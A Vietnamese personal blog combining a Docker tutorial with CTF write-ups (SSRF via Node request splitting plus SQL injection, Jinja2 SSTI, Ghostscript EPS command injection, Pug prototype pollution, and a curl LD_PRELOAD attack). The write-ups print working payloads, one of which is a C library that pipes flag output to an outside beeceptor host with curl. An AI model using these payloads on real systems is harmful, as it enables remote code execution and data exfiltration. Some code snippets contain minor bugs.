d3s34's blog

Docker and CTF

Nguyen Dinh Bien — Wed, 19 Jan 2022 15:53:09 GMT

Docker

Docker là gì?

Docker là gì? Docker là nền tảng sử dụng để phát triển, đóng gói và chạy ứng dụng. Về cơ bản, Docker sử dụng công nghệ Container hóa để cô lập các ứng dụng và tách nó ra khỏi hạ tầng sử dụng, bằng cách này thì việc triển khai và phát triển sẽ đồng bộ hơn. Cái này tương tự việc ảo hóa nhưng cái này thì nhẹ và dễ cài đặt, thay đổi hơn nhiều.

Ví dụ: mình cần chạy ứng dụng khác với môi trường hiện tại trên máy như là đang chạy Mysql 8.0 mà cần Mysql 5.7 hoặc Mariadb thì thay vì gỡ hiện tại ra cài lại, hoặc tạo một máy ảo chỉ để host server này thì chỉ cần khởi chạy một Container chứa Mysql 5.7 là xong, môi trường sẽ độc lập với môi trường mình đang có.

Điểm qua tính năng của Docker

Docker tương đối nhiều tính năng nhưng mình điểm qua một số tính năng và câu lệnh mình hay dùng cho việc audit.

Run

Đơn giản là chạy một container từ một image. Cuối cùng mục đích sau này là chạy được lệnh này

# Run a container from  image docker/getting-started
docker run docker/getting-started
# Run with detached mode 
docker run -d docker/getting-started
# Run with pseudo-TTY
docker run -it docker/getting-started
# Remove container after run
docker run --rm  docker/getting-started
# Ps container
docker ps 
# Stop container 
docker stop 
# Remove container 
docker rm 
# Exec command
docker exec  
# Copy file to environment
docker cp : 
# Copy file from environment 
docker cp  :

Build

Thay vì dùng image có sẵn, có thể tạo ra các Image của riêng mình và build, sử dụng cho việc vọc sau này. Đầu tiền cần tạo ra một file để Docker có thể tạo ra image từ đó. Ví dụ mình cần chạy một app Node.js đã được code xong như sau thì mình tạo một Dockerfile:

# syntax=docker/dockerfile:1
FROM node:12-alpine
RUN apk add --no-cache python3 g++ make
WORKDIR /app
COPY . .
RUN yarn install --production
CMD ["node", "src/index.js"]

Để build Dockerfile trên thành image chỉ cần chạy.

docker build -t getting-started

Cái này có lợi việc audit sau này là chỉ cần thêm Debugger vào các image có sẵn là có thể sử dụng luôn mà không phải Setup nhiều.

Volume

Về cơ bản các container tạo ra ở trên được cô lập với môi trường bên ngoài. Nếu Container độc lập dữ liệu với môi trường bên ngoài nên khi bị xóa thì dữ liệu sẽ mất hết. Docker có cung cấp một chức năng là tạo ra volume để lưu trữ dữ liệu từ container này. Có hai loại volume ở đây bao gồm:

Named Volumes: là các volume mà docker quản lý nơi lưu trữ, mình chỉ quan tâm tới việc sử dụng tên. Phù hợp lưu trữ liệu từ Database cho các container và sử dụng lại khi tạo lại container.
Bind Mounts: gắn dữ liệu trong phân vùng với dữ liệu hiện có trên môi trường. Phù hợp với việc Dev và chạy luôn kết quả.

# Create Volume with name mysql-data 
docker run -dp 3306:3306 \
     -v mysql-data:/var/lib/mysql \
     -e MYSQL_ROOT_PASSWORD=secret \
     -e MYSQL_DATABASE=todos \
     mysql:5.7
# Run with nodemon, restart app when change in source code at ./app 
# without rebuild image
docker run -dp 3000:3000 \
     -w /app -v "$(pwd):/app" \
     node:12-alpine \
     sh -c "yarn install && yarn run dev"

Network

Như đã nói ở trên thì container tương đối cô lập với môi trường bên ngoài, nên để có thể sử dụng được các kết nối ra môi trường bên ngoài và các container khác thông qua network thì tùy các case có thể liên quan đến việc:

Thiết lập network giữa các container: thì các container có cần chung một network khi đó, các container có thể liên lạc với nhau qua alias name như một host.
Public port ra ngoài môi trường bằng cách binding port.

# Create network for todo-app 
docker network create todo-app
# Run database with host mysql
docker run -d \
     --network todo-app --network-alias mysql \
     -v todo-mysql-data:/var/lib/mysql \
     -e MYSQL_ROOT_PASSWORD=secret \
     -e MYSQL_DATABASE=todos \
     mysql:5.7

# Run app with same network, database can connect via host mysql
# Port 3000 in container will be map to localhost:80   
docker run -d -p 80:3000 \
   -w /app -v "$(pwd):/app" \
   --network todo-app \
   -e MYSQL_HOST=mysql \
   -e MYSQL_USER=root \
   -e MYSQL_PASSWORD=secret \
   -e MYSQL_DB=todos \
   node:12-alpine \
   sh -c "yarn install && yarn run dev"

Docker-compose

Tạo ra tạo lại liên tục các Image và Container bằng tay có vẻ hơi lâu nên có Docker-compose được sinh ra để giải quyết cái này một cách đồng bộ.

Chúng ta có thể gom tất cả việc bên trên vào một file Docker-compose.yml như sau

version: "3.7"

services:
  app:
    image: node:12-alpine
    command: sh -c "yarn install && yarn run dev"
    ports:
      - 3000:3000
    working_dir: /app
    volumes:
      - ./:/app
    environment:
      MYSQL_HOST: mysql
      MYSQL_USER: root
      MYSQL_PASSWORD: secret
      MYSQL_DB: todos

  mysql:
    image: mysql:5.7
    volumes:
      - todo-mysql-data:/var/lib/mysql
    environment:
      MYSQL_ROOT_PASSWORD: secret
      MYSQL_DATABASE: todos

volumes:
  todo-mysql-data:

Và sử dụng Docker-compose để khởi tạo, quản lý thông qua service name thay vì từ container.

docker-compose up -d
docker-compose down
docker-compose start
docker-compose stop
docker-compose exec

Tổng kết

Còn khá nhiều chức năng, đặc tả mình chưa nhắc đến khi sử dụng. Tùy từng trường hợp mọi người có thể đọc thêm ở các tài liệu khác.

Reference

https://docs.docker.com/get-started/overview/

Docker and PHP

Comming soon...

Docker and Java

Comming soon...

Docker and Nodejs

Comming soon...

Docker and Python

Comming soon...

BabyEncryption

Nguyen Dinh Bien — Wed, 19 Jan 2022 15:48:24 GMT

Walkthrough

Đề bài đưa ra một Source code bao gồm hàm bị mật mã hóa (encrypt) và một đoạn thông báo(message) đã bị mật mã hóa. Về cơ bản đoạn mã hóa này chỉ sử dụng toán học và mã hóa (encoding) để sinh ra bản mã(cipher text).

def encryption(msg):
    ct = []
    for char in msg:
        ct.append((123 * char + 18) % 256)
    return bytes(ct)

...
f.write(ct.hex())

Xét về diện toán học thì đây là phép lấy modul của một phép tuyến tính nên chỉ cần biến đổi lại như sau

y=(123x+18)mod256 
y≡(123x+18)(mod256) 
y−18≡123x(mod256)
123−1(y−18)≡x(mod256) 
179(y−18)≡x(mod256) 
179y+106≡x(mod256)

Đây là mã hóa Affine mà mình vừa mới học (nửa môn trong 1 ngày :D)

Và hàm decrypt sẽ đơn giản như sau:

def inverse_decrypt(cipher: bytes):
    msg = ""
    for c in cipher:
        msg += chr((179 * x + 106) % 256)
    return msg

Tuy nhiên dưới góc nhìn của một coder(mình chưa chơi ctf crypt bao giờ ^^) thì các char được ánh xạ 1-n thành cipher nhưng là có thể tìm được kí tự cipher nếu coi như nó ánh xạ 1-1 với các kí tự char trong bảng mã ascii, và mình chỉ lấy các kí tự printable thì ta có cách decrypt sau

P/s: Theo lý thuyết, thì do cái hệ số 123 là khả nghịch (inversable) trong nhóm modular 256 nên nó là ánh xạ 1-1, nên cách giải này luôn đúng =)))

def decrypt(msg: bytes):

    mapping_table = {}
    for c in string.printable:
        mapping_table[(123 * ord(c) + 18) % 256] = c

    msg_dec = ''
    for c in msg:
        if mapping_table[]:
            msg_dec += mapping_table[c]
        else:
            msg_dec += c

    return msg_dec

Rõ ràng cách dưới nhanh hơn tuy hơi cần điều kiện để nó thỏa mãn toán học một chút nhưng mình nghĩ cách này có vẻ đúng với cách chơi ctf này ._. Mình mong sau khi chơi ctf về crypt mình sẽ khẳng định được cách này là đúng.

Weather App

Nguyen Dinh Bien — Wed, 19 Jan 2022 15:43:58 GMT

Tóm tắt

Đây lại là một bài Whitebox, cần một chút hiểu biết(đã từng làm) về các lỗ hổng khác để có thể hoàn thành bài.

Điểm đang chú ý nhất là việc lỗi dẫn đến lỗ hổng SSRF ở bài này là việc chuyển đổi từ String tới bytes có thể dẫn tới lỗ hổng.

Walkthrough

Lướt qua ứng dụng cũng không có gì ngoài việc ứng dụng đưa ra dữ liệu về thời tiết hiện tại. Phải lướt qua source để tìm kiếm thêm API.

Flag sẽ được đưa ra khi chúng ta login được vào tài khoản admin. Ngoài ra, còn một API cho phép ta đăng ký tài khoản mới và tại đây tồn tại lỗ hổng SQL Injection (cái này tác giả cũng cẩn thận note lại cho mọi người).

Việc xử lý tài khoản admin được tạo ban đầu có thể bypass tương tự như trong MYSQL với SQLite on Conflict. Nhưng một vấn đề ở đây là việc đăng kí chỉ có phép từ Local!

Mình lúc đầu cũng ngây thơ khi tìm cách bypass cái regex này thông qua việc sửa Header để bypass nhưng mọi nỗ lực tìm kiếm đều chỉ ra việc bypass cái regex này là không thể =)))

Quay ra tìm thêm được một đoạn API thời tiết để lấy thông tin có thể Injection nhưng API cũng chỉ là để đổ dữ liệu ra Frontend, không thấy sử dụng phía Server side.

Cuối cùng quay lại với file Docker thì phát hiện khá hay là ứng dụng này dùng Nodejs v8.12.0 một phiên bản khá là cũ với phiên bản LTS hiện tại là v14 và v12 tức là còn trước cả v10. Tìm hiểu một hồi lâu thì phiên bản này tồn tại khá nhiều lỗ hổng, đặc biệt có vài lỗ hổng liên quan tới SSRF thông qua Request Splitting, và mình lang thang một hồi tìm được bài này Security bugs: SSRF via Request Splitting .

Tóm váy nhanh thì như sau:

http.get() nhận vào đối số là một string.
Nhưng việc thực hiện gửi HTTP requestthì cần sử dụng là bytes array chứ không thể thực hiện trên string. Do đó các string khi được đưa vào sẽ đồng thời chuyển về bytes array và escape các kí tự đặc biệt.
Việc thực hiện này lại sử dụng việc decoding mặc định của Nodejs thông qua bộ mã hóa latin1 nếu không có body.
Bộ mã hóa này không thể hiện các ký tự unicode high-numbered unicode, mà chỉ biểu diễn bằng cách chỉ sử dụng phần low-numbered unicode.

> v = "/caf\u{E9}\u{01F436}"
'/café🐶'
> Buffer.from(v, 'latin1').toString('latin1')
'/café=6'

Do đó, có thể chèn các kí tự ngắt (CRLF) để có thể thực hiện Request Splitting bằng cách sử dụng các ký tự \u010A\u010D thì sẽ trở thành ký tự ngắt CRLFkhi được gửi đi.

Quay lại với cái lỗ hổng ở mã nguồn ở trên thì việc có thể thực hiện chuyển mật khẩu tài khoản admin thông qua Request splitting tới API lấy dữ liệu thời tiết.

Request cần gửi sẽ có dạng như sau, nhớ là giữa các request cần loại bỏ HeaderConnection: close để tránh đóng kết nối khi tất cả các request chưa được chạy hết, chỉ để lại Header này ở request cuối cùng.

GET /api... here> HTTP/1.1
Host: 127.0.0.1

POST /register HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
username=admin&password=123') on conflict(username) do update set password='d3s34'-- -

GET /.. here> HTTP/1.1
Host: 127.0.0.1
Connection: close

Để thực hiện đoạn body ở giữ thì cần đưa ngắt dòng của HTTP Request vào thông qua lỗ hổng phía trên của NodeJs. Đoạn code exploit mình viết được sẽ như sau:

def exploit():
    crlf = "\u010D\u010A"
    space = "\u0120"

    username = "admin"
    password="1') on conflict(username) do update set password='d3s34';-- -"\
        .replace(" ", space)\
        .replace("'", "%27")

    payload = f"{space}HTTP/1.1{crlf}" \
              f"Host:{space}127.0.0.1{crlf}" \
              f"{crlf}" \
                        \
              f"POST{space}/register{space}HTTP/1.1{crlf}" \
              f"Host:{space}127.0.0.1{crlf}" \
              f"Content-Type:{space}application/x-www-form-urlencoded{crlf}" \
              f"Content-Length:{space}{len(username) + len(password) + len('username=&password=')}{crlf}" \
              f"{crlf}" \
              f"username={username}&password={password}{crlf}" \
              f"{crlf}" \
                        \
              f"GET{space}/VN"

    data = {
        "endpoint": "127.0.0.1",
        "city": "Hanoi",
        "country": "VN" + payload
    }

    response = requests.post(url="http://188.166.173.208:31625/api/weather", data=data)

Và kết quả sẽ đăng nhập được thông qua mật khẩu Injection được ở trên.

Templated

Nguyen Dinh Bien — Wed, 19 Jan 2022 15:39:33 GMT

Tóm tắt

Đây một bài Blackbox cần quan sát thêm ở các thông tin đưa ra là có thể nhận ra.

Vector attack ở bài này liên quan tới SSTI (sever side template injection) khi cho phép người dùng tùy ý điều khiển ở một số page tưởng như vô hại dẫn đến RCE.

Walkthrough

Đầu tiên khi bước vào thì website hiển thị duy nhất thông tin về Framework sử dụng.

Dựa vào tên Framework là Flask/Jinja2 và tên của Challenge thì tìm đã search được về lỗi hổng SSTI ở framework này. Nhưng mà website này trống, lấy gì để injection đây? Mình thử test thêm URL random xem lấy thêm được thông tin gì không ._.

Ồ, nó sử dụng template để in ra tên page lỗi? Injection thử payload trong Cheat sheet xem thế nào nhỉ ._.

Đúng như dự đoán, có thể Injection tại đây. Vậy làm như thế nào để RCE đây? Thì các tài liệu liên quan đến lỗ hổng SSTI của Python nhắc đến rất nhiều từ khóa MRO (method resolution order). Mình đọc qua thì cơ bản nó là cách mà Python lookup các attributes khi mà Python cho phép đa kế thừa (multiple inheritance) thì việc các lớp cha có cùng thuộc tính là có thể xảy ra, việc lookup này diễn ra từ dưới lên trên, từ trái qua phải của các lớp kế thừa. Và các lớp này có thể truy cập thông qua phương thức mro() hoặc __mro__ . Từ đây ta có thể gọi các lớp hoặc thuộc tính khác từ đây.

Trở lại với website thì thử với các thuộc tính của một string lớp bình thường xem sao nhé

Vậy là từ đây có thể gọi đến các thuộc tính của lớp object là cha tất cả lớp khác. Phương thứcsubclasses() có thể gọi ra được tất cả các subclass đó.

Ta có ở đây một lô các lớp. Lớp Popen có thể RCE nên lấy đúng vị trí của nó là được =)) Nhưng nhiều thế này đếm đến bao giờ :"< Rất may python có phương thức slice mảng khá hay nên tìm nó cũng không đến mức phải đếm từng cái một.

Vậy xác định được index của lớp Popen. Rồi tạo một instance rồi lấy data ra thôi. Payload đầy đủ sẽ thế này.

"".__class__.__mro__[1].__subclasses__()[414](["cat flat.txt"],shell=True,stdout=-1).communicate()

Và lấy flag ra thôi :v

petpet rcbee

Nguyen Dinh Bien — Wed, 19 Jan 2022 15:37:10 GMT

Tóm tắt

Bài này tiếp tục là một bài Whitebox.

Lỗi đến từ việc sử dụng thư viện có lỗ hổng ở đây là Pillow.

Walkthrough

Nói sơ qua về Web thì đây là một Web cho phép upload ảnh là tập hợp chúng lại thành một ảnh Gif

Xem qua một chút source thì có duy nhất một API cho phép upload

Lúc đầu mình có dự đoán là lỗ hổng xảy ra do việc upload file nhưng source sử dụng các hàm khá an toàn.

ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])

generate = lambda x: os.urandom(x).hex()

def allowed_file(filename):
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

def save_tmp(file):
    tmp  = tempfile.gettempdir()
    path = os.path.join(tmp, secure_filename(file.filename))
    file.save(path)
    return path

Vậy cuối cùng phải tìm các hàm khác gây lỗi, và mình tìm được bài sau về lỗ hổng RCE của Pillow liên quan tới GhostScript. Lỗ hổng ngày bắt nguồn từ việc Pillow sử dụng GhostScript để xử lý các file liên quan tới EPS.

# Build Ghostscript command
    command = [
        "gs",
        "-q",  # quiet mode
        "-g%dx%d" % size,  # set output geometry (pixels)
        "-r%fx%f" % res,  # set input DPI (dots per inch)
        "-dBATCH",  # exit after processing
        "-dNOPAUSE",  # don't pause between pages
        "-dSAFER",  # safe mode
        "-sDEVICE=ppmraw",  # ppm driver
        "-sOutputFile=%s" % outfile,  # output file
        # adjust for image origin
        "-c",
        "%d %d translate" % (-bbox[0], -bbox[1]),
        "-f",
        infile,  # input file
        # showpage (see https://bugs.ghostscript.com/show_bug.cgi?id=698272)
        "-c",
        "showpage",
    ]

    ...

    # push data through Ghostscript
    try:
        startupinfo = None
        if sys.platform.startswith("win"):
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        subprocess.check_call(command, startupinfo=startupinfo)
        im = Image.open(outfile)
        im.load()
    finally:
        ...

Và GhostScript tồn lại lỗ hổng Command Injection. Tuy việc Web đã filter extension đầu vào rồi tuy nhiên Pillow tự động xác định filetype của EPS thông quan header ví dụ như !PS-Adobe-3.0 EPSF-3.0Do đó, việc upload và xử lý thông qua Pillow có thể dấn đến Command Injection.

def petpet(file):

    if not allowed_file(file.filename):
        return {'status': 'failed', 'message': 'Improper filename'}, 400

    try:

        tmp_path = save_tmp(file)

        bee = Image.open(tmp_path).convert('RGBA')
        frames = [Image.open(f) for f in sorted(glob.glob('application/static/img/*'))]
        finalpet = petmotion(bee, frames)

        filename = f'{generate(14)}.gif'
        finalpet[0].save(
            f'{main.app.config["UPLOAD_FOLDER"]}/{filename}', 
            save_all=True, 
            duration=30, 
            loop=0, 
            append_images=finalpet[1:], 
        )

        os.unlink(tmp_path)

        return {'status': 'success', 'image': f'static/petpets/{filename}'}, 200

    except:
        return {'status': 'failed', 'message': 'Something went wrong'}, 500

Và bài viết phía trên cung cấp luôn PoC rồi nên mình sử dụng luôn. Để đơn giản nên mình Exfiltration thông qua folder static luôn. PoC sẽ như sau

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cp /app/flag /app/application/static) currentdevice putdeviceprops

Và lấy flag xuống thôi :v

>> curl http://188.166.173.208:30218/static/flag                    
HTB{c0mfy_bzzzzz_rcb33s_v1b3s}%

Gunship

Nguyen Dinh Bien — Wed, 19 Jan 2022 15:31:37 GMT

Tóm tắt

Bài này là một bài White Box khi mà được cung cấp cả Source Code.

Gunship là một Web Application được code bằng Nodejs có sử dụng phiên bản thư viện tồn tại lỗ hổng Prototype Pollution.

Walkthrough

Lướt qua ứng dụng thì có duy nhất một tính năng là tên xong trả về lời chào ._.

Chúng ta cũng được cung cấp luôn source code.

Có 2 endpoint trong đó API khá dài, có thể lỗi ở đây.

const path              = require('path');
const express           = require('express');
const pug                = require('pug');
const { unflatten }     = require('flat');
const router            = express.Router();

router.get('/', (req, res) => {
    return res.sendFile(path.resolve('views/index.html'));
});

router.post('/api/submit', (req, res) => {
    const { artist } = unflatten(req.body);

    if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
        return res.json({
            'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
        });
    } else {
        return res.json({
            'response': 'Please provide us with the full name of an existing member.'
        });
    }
});

module.exports = router;

Bài này mình nhận ra ngay ở lúc đọc source. Sử dụng Pug là một template engine để compile thành html và sử dụng flat để unflatten dữ liệu. Hai thư viện này đã tồn tại lỗi ở một số phiên bản trước, 2 phiên bản này mình từng phân tích ở https://github.com/biennd279/pug-ast dựa trên bài https://blog.p6.is/AST-Injection/ nên mình check luôn ở file package.json thì đúng vậy.

{
    /** **/
    "dependencies": {
        "express": "^4.17.1",
        "flat": "5.0.0",
        "pug": "^3.0.0"
    }
}

Nên sử dụng luôn Payload mình đã từng viết. Mình đẩy qua static để lấy được folder hiện tại đỡ phải đẩy ra bên ngoài.

{
    "artist.name":"Haigh dasea",
    "__proto__.block": {
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('ls > /app/static/pwd')"
    }
}

Và lấy đẩy flag qua static và lấy flag về thôi.

{
    "artist.name":"Haigh dasea",
    "__proto__.block": {
         "type": "Text", 
         "line": "process.mainModule.require('child_process').execSync('cp /app/flag0HKDx /app/static/flag')"
    }
}

csaw21-ctf

Nguyen Dinh Bien — Wed, 19 Jan 2022 14:23:43 GMT

ninja

Đầu tiên, khi vào chúng ta có duy nhất một URL dẫn đến một Page. Page này cho phép ta nhập tên và render ra lời chào tới tên đó. Lỗ hổng dễ nhận ra đó là SSTI tương tự bài Templated.

Cách exploit tương tự bài Templated ở trên tuy nhiên, chúng ta bị filter các keyword cho là nguy hiểm...

Vậy là chúng ta bị filter _ và base. Cần tìm được cách bypass được các filter này. Mình tìm được bài này và bài này. Nên chúng ta có các quy tắc thay thế sau:

Sử dụng attr() để gọi các attribute của tham số.
Các tham số được truyền thông qua | tương tự pipeline.
Ký tự _ được thay thế bằng \x5f
Khi tham chiếu đến các phần tử thì sử dụng __getitem()__ thay cho [ ]

Và do từ khóa base bị filter nên đương nhiên ta sẽ dùng qua MRO.

Ở bài Templated thì mình có dùng slice để tìm được class Popen nhanh nhưng ở đây tìm phép thay thế có vẻ mất thời gian nên mình có học theo bài trên medium là dùng Python để tìm index bằng cơm :v

file = open("lol.txt", "r")
    lst = file.read().split(",")
    for index, value in enumerate(lst):
        if value.find("Popen") != -1:
            print(index, value)

Tìm được index rồi thì pass tham số vào thôi!

Payload đầy đủ sẽ như sau

http://web.chal.csaw.io:5000/submit?value={""|attr("\x5f\x5fclass\x5f\x5f")|attr("\x5f\x5fmro\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")(2)|attr("\x5f\x5fsubclasses\x5f\x5f")()|attr("\x5f\x5fgetitem\x5f\x5f")(258)("cat flag.txt",shell=True,stdout=-1)|attr("communicate")()}}

asis-ctf

Nguyen Dinh Bien — Sat, 15 Jan 2022 15:59:46 GMT

cuuurl

cUrl, nhưng không phải Command Injection, mà là Environment Variable to RCE ._.

Tiếp tục là một bài Whitebox tiếp =))

Walkthrough

Vừa vào thử luôn trang web xem có gì luôn nhỉ

Response có đoạn xin chào mình vào để ý ở trên URL thì có đường dẫn tới file. Có vẻ bài này liên quan tới lỗ hổng Arbitrary file read roài.

Thử xem xét mã nguồn luôn nào

@app.route('/')
def index():  # Poor coding skills :( can't even get process output properly
    url = request.args.get('url') or "http://localhost:8000/sayhi"
    env = request.args.get('env') or None
    outputFilename = request.args.get('file') or "myreg rets.txt"
    outputFolder = f"./outputs/{hashlib.md5(request.remote_addr.encode()).hexdigest()}"
    result = ""

    if env:
        env = env.split("=")
        env = {env[0]: env[1]}
    else:
        env = {}

    master, slave = pty.openpty()
    os.set_blocking(master, False)
    try:
        subprocess.run(["/usr/bin/curl", "--url", url], stdin=slave, stdout=slave, env=env, timeout=3, )
        result = os.read(master, 0x4000)
    except:
        os.close(slave)
        os.close(master)
        return '??', 200, {'content-type': 'text/plain;charset=utf-8'}

    os.close(slave)
    os.close(master)

    if not os.path.exists(outputFolder):
        os.mkdir(outputFolder)

    if "/" in outputFilename:
        outputFilename = secrets.token_urlsafe(0x10)

    with open(f"{outputFolder}/{outputFilename}", "wb") as f:
        f.write(result)

    return redirect(f"/view?file={outputFilename}", code=302)

Hàm chính được sử dụng ở route index, cho phép tải Url bất kì vào lưu và chỉ định file bất kì vào trong Folder outputs của mình (ở đây được định danh bằng mã hash của remote IP). Tên file cũng được validate để tránh mình đẩy file ra ngoài thư mục được phép. Ngoài ra mình còn được xét biến môi trường tùy ý.

@app.route('/view')
def view():
    outputFolder = f"./outputs/{hashlib.md5(request.remote_addr.encode()).hexdigest()}"
    outputFilename = request.args.get('file')

    if not outputFilename or "/" in outputFilename or not os.path.exists(f'{outputFolder}/{outputFilename}'):
        return '???', 404, {'content-type': 'text/plain;charset=utf-8'}

    with open(f'{outputFolder}/{outputFilename}', 'rb') as f:
        return f.read(), 200, {'content-type': 'text/plain;charset=utf-8'}

Tiếp tục hàm view này trả về nội dung file đã lưu trước đó trong thư mục của mình. Nhưng cũng được validate để tránh đọc file lung tung. Nên cũng không đọc được dữ liệu gì từ đây, bắt buộc phải điều khiển được dữ liệu đầu vào.

Hm...kinh nghiệm mình làm một số bài trước đây thì nếu cUrl cho phép nhập trực tiếp Url thì có thể Command Injection luôn ấy nhỉ? Nhưng giá trị Shell trong trong subprocess không được để là true nên giá trị thì nó cũng đẩy thành string chứ không injection được :disappointed_relieved: Không lên thẳng được shell phải tìm các lỗ hổng khác xem, mình điều khiển được khá nhiều giá trị mà :-D .

Không thể command injection qua Url nhưng mình có thể điều khiển được nó mà? cUrl hỗ trợ nhiều giao thức cUrl manual trong đó có giao thức file nên mình có thể đi đâu trả được :-D

➜  ~ curl http://localhost:8000/\?url\=file:///etc/passwd -L

root:x:0:0:root:/root:/bin/bash
...
app:x:1000:1000::/home/app:/bin/sh

Nhưng mà flag lại không đọc được :"<

FROM python:3

RUN apt-get update -y
RUN apt-get install -y curl
RUN pip3 install flask

WORKDIR /app

COPY ./flag.txt /flag.txt
COPY ./stuff/readflag /readflag
COPY ./stuff/app.py ./app.py
RUN chmod 400 /flag.txt
RUN chmod 111 /readflag
RUN chmod +s /readflag
RUN chmod +x ./app.py
RUN useradd -m app
RUN mkdir /app/outputs
RUN chown app /app/outputs


USER app
CMD [ "/app/app.py" ]

Quyền sở hữu root, phân quyền 400. Tức là chỉ có root mới đọc được. Nhưng may thay readflag được set sticky bit nên nó đọc được, cũng tức là quay lại việc tìm cách RCE chứ không phải chỉ là đọc ghi file.

Quay lại phía trên thì còn biến môi trường mình có thể điều khiển được, cũng tức là đây có thể là lựa chọn duy nhất nếu muốn RCE. Lang thang tìm kiếm theo keyword về việc RCE thông qua biến môi trường thì tìm được bài Playing with LD_PRELOAD.

Hmm...Tức là có thể hook được command thông qua set biến môi trường LD_PRELOAD à. Tiếp tục đọc thêm vào được giúp đỡ của team mình thì mình định hình được như sau:

LD_PRELOAD là biến được dùng để trỏ đến các thư viện (shared lib) để tải lên trước.
Các hàm này sẽ được tải lên đầu tiên đồng thời cũng override lại các hàm sau này.
hàm void _init() sẽ được thực thi đầu tiên để khởi tạo nếu cần.
Tránh đệ quy nếu tiếp tục gọi subprocess thì cần unset("LD_PRELOAD") trước khi gọi các subprocess tiếp :"< .

Như vậy là việc đầu tiên cần làm là tạo ra một shared lib để có thể đẩy cho các bước sau đó, để khi thực thi cUrl ta sẽ đặt biến môi trường tới nó để Trigger được lệnh.

Lâu không code C với việc ngáo ngơ các biến môi trường trên thì với sự giúp đỡ của team mình tạo được thư viện có thể trigger để làm payload như sau.

#include 
#include 
#include 
#include 

void _init() {
    unsetenv("LD_PRELOAD");
    system("/readflag | curl https://biennd4.free.beeceptor.com/ -d @-");
}

Complie nó thành shared lib và đẩy lên server để tẹo tải về bằng cUrl.

➜  ~ gcc -fPIC -shared -o hsvcs.so hsvcs.c -nostartfiles

Tiếp tục kéo về thưc mục của mình và thêm Env thôi nhưng lại có lỗi xảy ra đó là cUrl không hiển thị file binary mà bắt buộc phải đặt output ra file. Nhưng mình có thể chèn thêm được gì ngoài Url đâu :cry:

Tiếp tục một sự giúp đỡ đến từ team HsVcs khi cho biết cUrl sẽ sử dụng config mặc định thông qua .curlrc, nó thường lưu tại $HOME/.curlrc với HOME ở đây tham khảo cUrl manual là biến môi trường mà mình đặt cho cUrl mà mình có thể điều khiển được biến môi trường. Vậy là việc đầu tiên phải là đẩy lên được file config đẩy lên để sử dụng nó để kéo được thư viện kia về.

➜  ~ curl http://65.108.152.108:5001/\?url\=https://biennd4.free.beeceptor.com/config\&file\=.curlrc -L                         
--output /tmp/hsvcs.so%

Để kéo thư viện kia về cần trỏ thư mục của mình thành $HOME, nó cũng không có gì do việc tính hash remote ip hashlib.md5(request.remote_addr.encode()).hexdigest() của mình nhưng không hiểu sao mình dùng VPS mới ra đúng được folder. Hay máy mình dùng IPv6 bị NAT lại thành IPv4 nên có lỗi này nhỉ.

➜  ~ curl http://65.108.152.108:5001/\?url\=https://d3s34.me/hsvcs.so\&env\=HOME%3D/app/outputs/8821b33244ff93dd962f963b7284dfeb
??%

Việc cuối cùng là đặt lại LD_PRELOAD để lấy flag thôi :sunglasses:.

➜  ~ http://65.108.152.108:5001/\?url\=https://d3s34.me/&env=LD_PRELOAD%3d/tmp/hsvcs.so